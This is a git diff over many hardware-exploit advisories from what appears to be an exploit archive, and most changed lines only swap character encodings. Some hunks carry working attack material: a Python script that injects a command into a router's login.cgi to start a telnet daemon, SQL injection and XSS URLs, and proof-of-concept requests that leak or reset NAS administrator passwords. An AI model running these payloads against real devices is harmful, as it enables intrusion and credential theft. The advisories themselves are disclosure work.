a/platforms/hardware/remote/35184.py b/platforms/hardware/remote/35184.py index 821b3653d..4a13b82a0 100755 --- a/platforms/hardware/remote/35184.py +++ b/platforms/hardware/remote/35184.py @@ -15,9 +15,9 @@ Successful exploitation of the vulnerability enables the attacker to gain full c import httplib headers = {} -body= GO=&jump=+ a*1379 +%3b+ /usr/sbin/utelnetd -d +%3b&pws=\n\n -conn = httplib.HTTPConnection(192.168.169.1?,8080) -conn.request(POST, /login.cgi, body, headers) +body= “GO=&jump=”+ “a”*1379 +”%3b”+ “/usr/sbin/utelnetd -d” +”%3b&pws=\n\n” +conn = httplib.HTTPConnection(“192.168.169.1″,8080) +conn.request(“POST”, “/login.cgi”, body, headers) response = conn.getresponse() data = response.read() print data \ No newline at end of file diff --git a/platforms/hardware/remote/36014.pl b/platforms/hardware/remote/36014.pl index 910f19081..7a69e610a 100755 --- a/platforms/hardware/remote/36014.pl +++ b/platforms/hardware/remote/36014.pl @@ -17,7 +17,7 @@ # prominent and allows for easier and more versatile security # systems in homes and businesses. A DVR surveillance security # system can be designed for indoor use or outdoor use and can -# often involve hidden security cameras, concealed nanny cams +# often involve hidden security cameras, concealed “nanny cams” # for home security, and even personal recording devices hidden # on a person. # diff --git a/platforms/hardware/remote/5150.txt b/platforms/hardware/remote/5150.txt index 99f9df4f2..7836aacac 100755 --- a/platforms/hardware/remote/5150.txt +++ b/platforms/hardware/remote/5150.txt @@ -1,4 +1,4 @@ -Thecus N5200Pro NAS Server Control Panel Remote File İnclude +Thecus N5200Pro NAS Server Control Panel Remote File Ä°nclude Author : Crackers_Child @@ -41,7 +41,7 @@ Bug in : usrgetform.html Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz? -İnfo : http://www.thecus.com/products_over.php?cid=11&pid=8 +Ä°nfo : http://www.thecus.com/products_over.php?cid=11&pid=8 Greetz: Str0ke diff --git a/platforms/hardware/remote/5289.txt b/platforms/hardware/remote/5289.txt index 311618605..6724d7f3e 100755 --- a/platforms/hardware/remote/5289.txt +++ b/platforms/hardware/remote/5289.txt @@ -4,7 +4,7 @@ Discover: Pranav Joshi Vendor: ZyXEL Products Affected: ZyWALL -(Status on other affected products & firmwares pending from vendor’s end) +(Status on other affected products & firmwares pending from vendor’s end) CVE-2008-1160 @@ -20,7 +20,7 @@ The vulnerability in the Quagga/Zebra routing daemon, exists due to the fact that the appliance fails to change the password needed to login into the Quagga/Zebra daemon running on ports 2601, 2602 (Quagga/RIP) & 2604 (Quagga/OSPF) /TCP, even though the password of the appliance has -been changed an attacker can still use the default password ‘zebra’ to +been changed an attacker can still use the default password ‘zebra’ to log into the Quagga/Zebra service to view and manipulate the routing information etc. of the appliance. @@ -28,6 +28,6 @@ The vulnerability was discovered on ZyWall 1050 appliance other versions could be affected as well. Information on other vulnerable products and firmwares is pending from -the vendor’s end. +the vendor’s end. # milw0rm.com [2008-03-21] diff --git a/platforms/hardware/remote/7496.txt b/platforms/hardware/remote/7496.txt index 6241fc955..b5298bf77 100755 --- a/platforms/hardware/remote/7496.txt +++ b/platforms/hardware/remote/7496.txt @@ -20,7 +20,7 @@ Description The index.cgi resource was identified as being susceptible to SQL Injection attacks. When filtering user accounts in Users->Account View section, the pattern_x parameter (where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set -to search_count_equals‘ value. +to search_count_equals‘ value. /cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0) diff --git a/platforms/hardware/remote/8696.txt b/platforms/hardware/remote/8696.txt index f5933b352..3bf582768 100755 --- a/platforms/hardware/remote/8696.txt +++ b/platforms/hardware/remote/8696.txt @@ -14,12 +14,12 @@ The hash is a salted MD5 hash of your password, the auth_code is the captcha val you entered, and the auth_id is unique to the captcha image that you viewed (this presumably allows the router to check the auth_code against the proper captcha image). The problem is that if you leave off the auth_code and auth_id values, some pages in the -D-Link Web interface think that you’ve properly authenticated, as long as you get +D-Link Web interface think that you’ve properly authenticated, as long as you get the hash right: GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a -Most notably, once you’ve made the request to post_login.xml, you can activate +Most notably, once you’ve made the request to post_login.xml, you can activate WPS with the following request: GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0 diff --git a/platforms/hardware/remote/9117.txt b/platforms/hardware/remote/9117.txt index 7b7fc7871..071431ad4 100755 --- a/platforms/hardware/remote/9117.txt +++ b/platforms/hardware/remote/9117.txt @@ -8,7 +8,7 @@ Vulnerable Products: - HTC devices running Windows Mobile 6.1 Non vulnerable products: - HTC devices running Windows Mobile 5.0 -- Other vendors’ Windows Mobile devices +- Other vendors’ Windows Mobile devices References: http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html Summary: @@ -95,12 +95,12 @@ You can find a list of tested HTC devices proved to be vulnerable at http://www. HTC devices running Windows Mobile 5.0 are not affected because the OBEX FTP service is not implemented in that OS version. -Other vendors’ Windows Mobile devices are not affected either: ASUS, Samsung, LG, ... +Other vendors’ Windows Mobile devices are not affected either: ASUS, Samsung, LG, ... Vendor Status: The vulnerability was first disclosed on 2009/01/19 as a whole Microsoft Bluetooth Stack issue in Windows Mobile 6 Professional. Subsequent tests proved that several Windows Mobile 6 Standard and Windows Mobile 6.1 Professional devices were also vulnerable. Microsoft was contacted on 2009/01/22 and this information was not made public because last mobile phones manufactured were vulnerable. -Further investigations proved that the issue is in a 3rd party driver installed by HTC, this vulnerability only affects to HTC devices and other vendors’ Windows Mobile devices are not affected. +Further investigations proved that the issue is in a 3rd party driver installed by HTC, this vulnerability only affects to HTC devices and other vendors’ Windows Mobile devices are not affected. HTC Europe has been contacted since 2009/02/09 and provided with all the details concerning on the exploitation of the flaw. However, no patches are known to be released for this security flaw. diff --git a/platforms/hardware/webapps/10247.txt b/platforms/hardware/webapps/10247.txt index 951510304..8f71771d5 100755 --- a/platforms/hardware/webapps/10247.txt +++ b/platforms/hardware/webapps/10247.txt @@ -7,7 +7,7 @@ ------------------------------------------------------------------------------------ Note : -Micronet introduces an exciting new productSP1910 Network Access Controller. It is +Micronet introduces an exciting new product—SP1910 Network Access Controller. It is specially designed for secure wired and wireless network environments of small or medium companies. Micronet UI is vulnerable to xss attack . diff --git a/platforms/hardware/webapps/11101.txt b/platforms/hardware/webapps/11101.txt index e2bd0b002..b73b67902 100755 --- a/platforms/hardware/webapps/11101.txt +++ b/platforms/hardware/webapps/11101.txt @@ -1,17 +1,17 @@ -Multiple D-Link routers suffer from insecure implementations of the Home Network Administration -Protocol which allow unauthenticated and/or unprivileged users to view and configure administrative +Multiple D-­Link routers suffer from insecure implementations of the Home Network Administration +Protocol which allow un­authenticated and/or un­privileged users to view and configure administrative settings on the router. Further, the mere existence of HNAP allows attackers to completely bypass the CAPTCHA login -features that D-Link has made available in recent firmware releases. +features that D-­Link has made available in recent firmware releases. -It is suspected that most, if not all, D-Link routers manufactured since 2006 have HNAP support and +It is suspected that most, if not all, D­-Link routers manufactured since 2006 have HNAP support and are vulnerable to one of the below described vulnerabilities. However, only the following routers and firmware versions have been confirmed to date: - 1) DI524 hardware version C1, firmware version 3.23 - 2) DIR628 hardware version B2, firmware versions 1.20NA and 1.22NA - 3) DIR655 hardware version A1, firmware version 1.30EA + 1) DI­524 hardware version C1, firmware version 3.23 + 2) DIR­628 hardware version B2, firmware versions 1.20NA and 1.22NA + 3) DIR­655 hardware version A1, firmware version 1.30EA Detailed description available here: http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf diff --git a/platforms/hardware/webapps/11677.txt b/platforms/hardware/webapps/11677.txt index 56679c3ab..63158100c 100755 --- a/platforms/hardware/webapps/11677.txt +++ b/platforms/hardware/webapps/11677.txt @@ -6,8 +6,8 @@ Friendly-Tech FriendlyTR69 CPE Remote Management V2.8.9 SQL Injection Vulnerabil ===================== I. BACKGROUND ===================== -Based on the companys technical expertise and a decade of hands-on experience -in the telecom industry, Friendlys solution is a ROBUST, SCALABLE, SECURED, +Based on the company’s technical expertise and a decade of hands-on experience +in the telecom industry, Friendly’s solution is a ROBUST, SCALABLE, SECURED, TELCO GRADE and COST-EFFECTIVE TR-069 solution. The TR-069 protocol was accepted as the standard for CPE management by the DSL, WiMAX, NGN / Optical network providers (some Cable operators are @@ -15,7 +15,7 @@ deploying TR-069 as well). Device Management & Auto Provisioning -Friendlys TR-069 solution delivers comprehensive remote management and +Friendly’s TR-069 solution delivers comprehensive remote management and auto-provisioning of CPEs that support the TR-069 standard - including modem/routers, IPTV/ STBs, ATA/VoIP, storage devices, media centers, etc. diff --git a/platforms/hardware/webapps/12092.txt b/platforms/hardware/webapps/12092.txt index 6eb714712..faac9a338 100755 --- a/platforms/hardware/webapps/12092.txt +++ b/platforms/hardware/webapps/12092.txt @@ -5,8 +5,8 @@ Release Date: Tue Apr 6, 2010 Affected Applications: Secure Mail (Ironmail) ver.6.7.1 Affected Platforms: FreeBSD 6.2 / Apache-Coyote 1.1 Local / Remote: Remote -Severity: Medium CVSS: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) -Researcher: Nahuel Grisola +Severity: Medium – CVSS: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) +Researcher: Nahuel Grisolía Vendor Status: Official Patch Released. Install McAfee Email Gateway 6.7.2 Hotfix 2. Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf diff --git a/platforms/hardware/webapps/17116.txt b/platforms/hardware/webapps/17116.txt index 228d69a57..a413ac13a 100755 --- a/platforms/hardware/webapps/17116.txt +++ b/platforms/hardware/webapps/17116.txt @@ -26,7 +26,7 @@ sized Offices. LCS-PS112: The LCS-PS112 Printserver connects your Printers directly to the Network -and gives every workstation in the network access for printing. The LCSPS112 +and gives every workstation in the network access for printing. The LCS–PS112 provides 2 x USB printerports and 1x Parallel printerport enablinge three Printers to share the whole Network. Easy and fast to configure with the PS-Admin-Tool. The LCS-PS112 is the right solution for small offices but also diff --git a/platforms/hardware/webapps/18504.txt b/platforms/hardware/webapps/18504.txt index 19a449562..e3e934caf 100755 --- a/platforms/hardware/webapps/18504.txt +++ b/platforms/hardware/webapps/18504.txt @@ -13,7 +13,7 @@ ____ _ _ ____ _ _ ____ _ _ ___ ____ ____ # Google Dork: NA # Vendor: http://www.sagem.com/index.php # Version: 253180972B May be Other Version are Affected -# Tested on: [Windows 7 Edition Intgrale] +# Tested on: [Windows 7 Edition Intégrale] #### diff --git a/platforms/hardware/webapps/19774.txt b/platforms/hardware/webapps/19774.txt index 7cbe527cc..83f09ce74 100755 --- a/platforms/hardware/webapps/19774.txt +++ b/platforms/hardware/webapps/19774.txt @@ -178,7 +178,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright ? 2012 Vulnerability-Lab + Copyright � 2012 Vulnerability-Lab diff --git a/platforms/hardware/webapps/20877.txt b/platforms/hardware/webapps/20877.txt index be416e78a..30895d948 100755 --- a/platforms/hardware/webapps/20877.txt +++ b/platforms/hardware/webapps/20877.txt @@ -3,7 +3,7 @@ == -Conceptronic GrabnGo and Sitecom Storage Center - Password disclosure Vulnerability - Security Advisory AA-002 +Conceptronic Grab’n’Go and Sitecom Storage Center - Password disclosure Vulnerability - Security Advisory AA-002 Severity Rating: High Discovery Date: May 5, 2012 @@ -28,18 +28,18 @@ Alcyon rates the severity of this vulnerability as high due to the following pro Our investigation showed that the mentioned products originate from the Taiwanese manufacturer Mapower. Possibly other rebranded Mapower network storage products are also affected by this flaw. =Risk Assessment -An attacker can harvest administrator credentials and log into the web management UI. Possibilities include but are not limited to reading and writing files stored on the device and altering the devices configuration. +An attacker can harvest administrator credentials and log into the web management UI. Possibilities include but are not limited to reading and writing files stored on the device and altering the device’s configuration. This means an attacker could: -Steal sensitive data stored on the device; -Leverage the device to drop and/or host malware; --Abuse the device to send spam through the victims Internet connection; +-Abuse the device to send spam through the victim’s Internet connection; -Use the device as a pivot point to access locally connected systems or launch attacks directed to other systems. -An investigation on our part shows that a multitude of affected devices are directly accessible through the Internet. It appears that this type of NAS-device is popular amongst small businesses. We have seen examples of video production companies and copy shops that utilize this device for file sharing purposes with their customers. Other cases of exposure seem to be unintentional. Since some ISPs assign multiple public IP-addresses to their customers, devices that are connected to the router obtain an Internet-routable IP-address. +An investigation on our part shows that a multitude of affected devices are directly accessible through the Internet. It appears that this type of NAS-device is popular amongst small businesses. We have seen examples of video production companies and copy shops that utilize this device for file sharing purposes with their customers. Other cases of exposure seem to be unintentional. Since some ISP’s assign multiple public IP-addresses to their customers, devices that are connected to the router obtain an Internet-routable IP-address. =Vulnerability -The web management UI validates the users login credentials through a JavaScript routine that queries hidden page elements: +The web management UI validates the user’s login credentials through a JavaScript routine that queries hidden page elements: function LoginSubmit(){ var data = document.getElementById("Users").value; data = data.split(":"); @@ -75,21 +75,21 @@ These hidden elements are populated by two different JavaScript functions found The getContent function is responsible for querying a URL and passing the result to the showLogin function. In this case the result of the web request consists of the username and password of the admin user in clear text form. =Proof of Concept -Paste the following URL into a web browsers address bar to obtain the administrators username and password: +Paste the following URL into a web browser’s address bar to obtain the administrator’s username and password: http:///cgi-bin/login.cgi?webmaster&1&Conceptronic2009 =Risk Mitigation -Updating your NAS firmware to the latest version will protect you from this particular attack, but the presence of this type of flaw and the vendors responses seem to be an indication for a lack of security awareness on their part. +Updating your NAS firmware to the latest version will protect you from this particular attack, but the presence of this type of flaw and the vendors’ responses seem to be an indication for a lack of security awareness on their part. Unfortunately, for owners of similar, other branded products originating from Mapower, a patched firmware version may be unavailable at this time. -We recommend that you limit access to the web management UI of the device by utilizing proper packet filtering and/or NAT on your router in order to limit network access to your NAS. Although this will not completely eliminate the risk of exploitation, it becomes substantially more difficult to leverage a successful attack, because it would involve either a compromise of another host on the victims local network or a client side attack that overcomes the Same Origin Policy restrictions of the victims web browser. +We recommend that you limit access to the web management UI of the device by utilizing proper packet filtering and/or NAT on your router in order to limit network access to your NAS. Although this will not completely eliminate the risk of exploitation, it becomes substantially more difficult to leverage a successful attack, because it would involve either a compromise of another host on the victim’s local network or a client side attack that overcomes the Same Origin Policy restrictions of the victim’s web browser. =Vendor responses -2L/Conceptronic acknowledged the presence of this flaw in the particular model and firmware version we reported, but did not disclose details on other products affected. Instead, the same flaw was silently patched in the firmware of a similar product. Updated firmware is available on the Conceptronicss website since July 27, 2012. The vendor did not coordinate the release of this firmware update with us. +2L/Conceptronic acknowledged the presence of this flaw in the particular model and firmware version we reported, but did not disclose details on other products affected. Instead, the same flaw was silently patched in the firmware of a similar product. Updated firmware is available on the Conceptronics’s website since July 27, 2012. The vendor did not coordinate the release of this firmware update with us. -As soon as our investigations pointed out that the affected devices originated from the Taiwanese manufacturer Mapower, we tried to contact them directly. Mapower neither has confirmed or denied the reported flaw. Interestingly, the same fix they provided to 2L/Conceptronic was already present in Sitecoms latest firmware and yet they had not notified 2L/Conceptronic about the flaw at that time. It took Mapower more than 2 months after our initial report to supply 2L/Conceptronic with the same fix. +As soon as our investigations pointed out that the affected devices originated from the Taiwanese manufacturer Mapower, we tried to contact them directly. Mapower neither has confirmed or denied the reported flaw. Interestingly, the same fix they provided to 2L/Conceptronic was already present in Sitecom’s latest firmware and yet they had not notified 2L/Conceptronic about the flaw at that time. It took Mapower more than 2 months after our initial report to supply 2L/Conceptronic with the same fix. =Fixed versions -Conceptronic CH3ENAS firmware version 3.0.12 available via http://www.conceptronic.net diff --git a/platforms/hardware/webapps/21032.txt b/platforms/hardware/webapps/21032.txt index f8e37217a..6eb516c53 100755 --- a/platforms/hardware/webapps/21032.txt +++ b/platforms/hardware/webapps/21032.txt @@ -1,4 +1,4 @@ -Security Advisory AA-003: Directory Traversal Vulnerability in Conceptronic GrabnGo Network Storage +Security Advisory AA-003: Directory Traversal Vulnerability in Conceptronic Grab’n’Go Network Storage Severity Rating: High Discovery Date: July 29, 2012 @@ -30,7 +30,7 @@ An attacker can read arbitrary files, including the files that stores the admini This means an attacer could: - Steal sensitive data stored on the device; - Leverage the device to drop and/or host malware; -- Abuse the device to send spam through the victims Internet connection; +- Abuse the device to send spam through the victim’s Internet connection; - Use the device as a pivot point to access locally connected systems or launch attacks directed to other systems. Vulnerability= @@ -50,9 +50,9 @@ on your router in order to limit network access to your NAS. Although this will exploitation, it becomes substantially more difficult to leverage a successful attack, because it would involve either -a compromise of another host on the victims local network or a client side attack that overcomes the Same Origin +a compromise of another host on the victim’s local network or a client side attack that overcomes the Same Origin -Policy restrictions of the victims web browser. +Policy restrictions of the victim’s web browser. Vendor Response= - 2L/Conceptronic has declared on August 1 that it is not in their power to influence the manufacturer's patching diff --git a/platforms/hardware/webapps/21033.txt b/platforms/hardware/webapps/21033.txt index 4e6df3e00..1fe829efc 100755 --- a/platforms/hardware/webapps/21033.txt +++ b/platforms/hardware/webapps/21033.txt @@ -30,7 +30,7 @@ An attacker can read arbitrary files, including the files that stores the admini This means an attacer could: - Steal sensitive data stored on the device; - Leverage the device to drop and/or host malware; -- Abuse the device to send spam through the victims Internet connection; +- Abuse the device to send spam through the victim’s Internet connection; - Use the device as a pivot point to access locally connected systems or launch attacks directed to other systems. Vulnerability= @@ -39,7 +39,7 @@ The CGI-script that is responsible for showing the device logs is affected by a allows an attacker to view arbitrary files. Proof of Concept Exploit= -Paste the following URL into a web browsers address bar to obtain the administrators username and password: +Paste the following URL into a web browser’s address bar to obtain the administrator’s username and password: http:///cgi-bin/info.cgi?syslog&../../etc/sysconfig/config/webmaster.conf @@ -51,9 +51,9 @@ on your router in order to limit network access to your NAS. Although this will exploitation, it becomes substantially more difficult to leverage a successful attack, because it would involve either -a compromise of another host on the victims local network or a client side attack that overcomes the Same Origin +a compromise of another host on the victim’s local network or a client side attack that overcomes the Same Origin -Policy restrictions of the victims web browser. +Policy restrictions of the victim’s web browser. We provide an installable package for Sitecom devices that enables browser based authentication (Basic Auth) as an effective workaround for this and future web management UI vulnerabilities. For details refer to diff --git a/platforms/hardware/webapps/21134.txt b/platforms/hardware/webapps/21134.txt index 354e6f962..1a1cb41bd 100755 --- a/platforms/hardware/webapps/21134.txt +++ b/platforms/hardware/webapps/21134.txt @@ -25,13 +25,13 @@ Products and firmware versions affected= - Possibly other rebranded Mapower network storage products Risk Assessment= -An attacker can log into the web management UI with an arbitrarily chosen password. Possibilities include but are not limited to reading and writing files stored on the device and altering the devices configuration. +An attacker can log into the web management UI with an arbitrarily chosen password. Possibilities include but are not limited to reading and writing files stored on the device and altering the device’s configuration. This means an attacker could: - Steal sensitive data stored on the device; - Leverage the device to drop and/or host malware; -- Abuse the device to send spam through the victims Internet connection; +- Abuse the device to send spam through the victim’s Internet connection; - Use the device as a pivot point to access locally connected systems or launch attacks directed to other systems. Vulnerability= @@ -40,14 +40,14 @@ Note that the cookie value is checked on the client so it can be easily circumve Proof of Concept Exploit= -Paste the following URL into a web browsers address bar to set the administrators password of a vulnerable Sitecom NAS: +Paste the following URL into a web browser’s address bar to set the administrator’s password of a vulnerable Sitecom NAS: curl http:///cgi-bin/setup.cgi?ChgSystemStatus&hackedSitecom&workgroup& Risk Mitigation= At the time of disclosure no updated firmware version was available. -We recommend that you limit access to the web management UI of the device by utilizing proper packet filtering and/or NAT on your router in order to limit network access to your NAS. Although this will not completely eliminate the risk of exploitation, it becomes substantially more difficult to leverage a successful attack, because it would involve either a compromise of another host on the victims local network or a client side attack that overcomes the Same Origin Policy restrictions of the victims web browser. +We recommend that you limit access to the web management UI of the device by utilizing proper packet filtering and/or NAT on your router in order to limit network access to your NAS. Although this will not completely eliminate the risk of exploitation, it becomes substantially more difficult to leverage a successful attack, because it would involve either a compromise of another host on the victim’s local network or a client side attack that overcomes the Same Origin Policy restrictions of the victim’s web browser. Vendor responses= None diff --git a/platforms/hardware/webapps/21395.txt b/platforms/hardware/webapps/21395.txt index 94162fd14..21dd5ebb9 100755 --- a/platforms/hardware/webapps/21395.txt +++ b/platforms/hardware/webapps/21395.txt @@ -30,7 +30,7 @@ and Web traffic such as viruses, worms, intrusions, inappropriate Web content an network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and -carriers, the FortiGate line combines the FortiOS security operating system with FortiASIC processors and other hardware to provide +carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including: * Firewall, VPN, and Traffic Shaping @@ -140,7 +140,7 @@ align=``left``> Tags -????? +​​​​​ <[PERSISTENT INJECTED SCRIPT CODE!]'<``=````> @@ -162,7 +162,7 @@ type=``hidden``>
-
????? +​​​​​ ... or @@ -214,7 +214,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright 2012 | Vulnerability Laboratory + Copyright © 2012 | Vulnerability Laboratory diff --git a/platforms/hardware/webapps/22005.txt b/platforms/hardware/webapps/22005.txt index befe83204..b494fd98e 100755 --- a/platforms/hardware/webapps/22005.txt +++ b/platforms/hardware/webapps/22005.txt @@ -7,7 +7,7 @@ Visual Tools develops, manufactures and commercializes video surveillance and video observations systems under the global brand -name VideoSafe Technology or under other companies? brand names. +name VideoSafe Technology or under other companies� brand names. The DVR systems are based on x86 Debian GNU Linux embedded (aka emdebian) and the entire framework and software are written using diff --git a/platforms/hardware/webapps/23498.txt b/platforms/hardware/webapps/23498.txt index c1eac3481..22579a75d 100755 --- a/platforms/hardware/webapps/23498.txt +++ b/platforms/hardware/webapps/23498.txt @@ -27,8 +27,8 @@ Common Vulnerability Scoring System: Introduction: ============= -The Dell SonicWALL Network Security Appliance (NSA) Series combines the patented Dell SonicWALL Reassembly -Free Deep Packet Inspection (RFDPI) engine with a powerful and massively scalable multi-core architecture to +The Dell® SonicWALL® Network Security Appliance (NSA) Series combines the patented Dell SonicWALL Reassembly +Free Deep Packet Inspection™ (RFDPI) engine with a powerful and massively scalable multi-core architecture to deliver intrusion prevention, gateway anti-virus, gateway anti-spyware, and application intelligence and control for businesses of all sizes. By integrating automated and dynamic security capabilities into a single platform, the NSA Series provides comprehensive Next-Generation Firewall protection without compromising performance. @@ -184,7 +184,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright 2012 | Vulnerability Laboratory + Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY diff --git a/platforms/hardware/webapps/23499.txt b/platforms/hardware/webapps/23499.txt index 7e6993653..79dd07825 100755 --- a/platforms/hardware/webapps/23499.txt +++ b/platforms/hardware/webapps/23499.txt @@ -26,7 +26,7 @@ Common Vulnerability Scoring System: Introduction: ============= Load Balancer .org have cemented our reputation as market leaders in affordable server load balancing appliances with the ground-breaking -release of firmware v7.0 for the Enterprise product family which includes a slick new web interface design and many additional features +release of firmware v7.0 for the Enterprise product family – which includes a slick new web interface design and many additional features which continue to keep us one step ahead of the competition. (Copy of the Vendor Homepage: http://www.loadbalancer.org ) @@ -214,7 +214,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright 2012 | Vulnerability Laboratory + Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY diff --git a/platforms/hardware/webapps/24435.txt b/platforms/hardware/webapps/24435.txt index 21b9822f7..722d17d99 100755 --- a/platforms/hardware/webapps/24435.txt +++ b/platforms/hardware/webapps/24435.txt @@ -27,7 +27,7 @@ Introduction: ============= The FortiMail family of appliances is a proven, powerful messaging security platform for any size organization, from small businesses to carriers, service providers, and large enterprises. Purpose-built for the most demanding -messaging systems, the FortiMail appliances utilize Fortinets years of experience in protecting networks against +messaging systems, the FortiMail appliances utilize Fortinet’s years of experience in protecting networks against spam, malware, and other message-borne threats. You can prevent your messaging system from becoming a threat delivery system with FortiMail. Its inbound filtering @@ -241,7 +241,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright 2012 | Vulnerability Laboratory + Copyright © 2012 | Vulnerability Laboratory diff --git a/platforms/hardware/webapps/24453.txt b/platforms/hardware/webapps/24453.txt index 91d541c4a..32a90fe7c 100755 --- a/platforms/hardware/webapps/24453.txt +++ b/platforms/hardware/webapps/24453.txt @@ -14,7 +14,7 @@ Firmware-Version : 2.14b01 - 22/01/2013 ============ Device Description: ============ -D-Link introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network. +D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network. Source (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r... German website: http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro... diff --git a/platforms/hardware/webapps/24464.txt b/platforms/hardware/webapps/24464.txt index c8d46f4a3..b2adde16a 100755 --- a/platforms/hardware/webapps/24464.txt +++ b/platforms/hardware/webapps/24464.txt @@ -69,7 +69,7 @@ Param: service_name http://192.168.178.188/setup.cgi?service_name=%22%3E%3Cimg%20src=%220%22%20onerror=alert%282%29%3E&svc_type=tcp&serv_sport=1&serv_endport=2&save=Anwenden&todo=save&h_svc_type=tcp&edit=1&h_ruleSelect=0&this_file=servinfo.htm&next_file=fw_serv.htm --> WLAN -> Zugriffsliste anpassen -> Hinzufgen -> Gertename +-> WLAN -> Zugriffsliste anpassen -> Hinzufügen -> Gerätename Param: device diff --git a/platforms/hardware/webapps/24466.txt b/platforms/hardware/webapps/24466.txt index 1f9e76f4e..54652bd93 100755 --- a/platforms/hardware/webapps/24466.txt +++ b/platforms/hardware/webapps/24466.txt @@ -39,16 +39,16 @@ For all this to work, you need to have a working connection to the network where For LAN,It usually works right on the spot, if you have a modem or Wi-Fi router. If you have an AccessPoint (AP) connected to your modem or router, you will need to switch the AP to the bridge mode in order to join the local network and Wi-Fi network into one. In -case you experience problems with connection, contact a specialist this can be easily adjusted. Its much harder with WWAN. Its a +case you experience problems with connection, contact a specialist – this can be easily adjusted. It’s much harder with WWAN. It’s a network access point provided by your cell network operator. As a rule, you cannot connect your computer to your device using WWAN. Still, if Internet access on your computer is provided by the same operator, everything will get connected and running. -The application wouldnt work in the background, so it switches off autoblocking while running. Any unexpected calls will -interrupt your file transfer. By default, the application allows storing a limited number of files no more than 3 of them; -with the size of each not more than 10 MB. But you can remove all these limitations at the minimal price of $0.99 / 0.89. -Second limitation - program show only 10 first photos in webalbum, remove this limitation - $0.99 / 0.89. +The application wouldn’t work in the background, so it switches off autoblocking while running. Any unexpected calls will +interrupt your file transfer. By default, the application allows storing a limited number of files – no more than 3 of them; +with the size of each not more than 10 MB. But you can remove all these limitations at the minimal price of $0.99 / €0.89. +Second limitation - program show only 10 first photos in webalbum, remove this limitation - $0.99 / €0.89. -Still, if something isnt working, DO NOT buy removal of restrictions this will not improve operability of the system itself. +Still, if something isn’t working, DO NOT buy removal of restrictions – this will not improve operability of the system itself. Pay ONLY in case everything works, and you need to store more than 3 files or larger size. The application include basic protection of the web-server from unauthorized access. @@ -205,7 +205,7 @@ media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pic other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. - Copyright 2012 | Vulnerability Laboratory + Copyright © 2012 | Vulnerability Laboratory diff --git a/platforms/hardware/webapps/24475.txt b/platforms/hardware/webapps/24475.txt index 1f4789372..c7a77af33 100755 --- a/platforms/hardware/webapps/24475.txt +++ b/platforms/hardware/webapps/24475.txt @@ -12,7 +12,7 @@ Source: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json= ============ Vulnerable Firmware Releases - e1500: ============ Firmware-Version: v1.0.00 - build 9 Feb. 17, 2011 -Firmware-Version: v1.0.04 - build 2 Mr. 8, 2012 +Firmware-Version: v1.0.04 - build 2 Mär. 8, 2012 Firmware-Version: v1.0.05 - build 1 Aug. 23, 2012 ============ Vulnerable Firmware Releases - e2500: ============ diff --git a/platforms/hardware/webapps/24483.txt b/platforms/hardware/webapps/24483.txt index 80de3216f..87a71f279 100755 --- a/platforms/hardware/webapps/24483.txt +++ b/platforms/hardware/webapps/24483.txt @@ -15,7 +15,7 @@ Affected Platforms: WR2543ND or any running the vulnerable firmware. Local / Remote: Remote -Severity: Medium ? CVSS: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N) +Severity: Medium � CVSS: 4.0 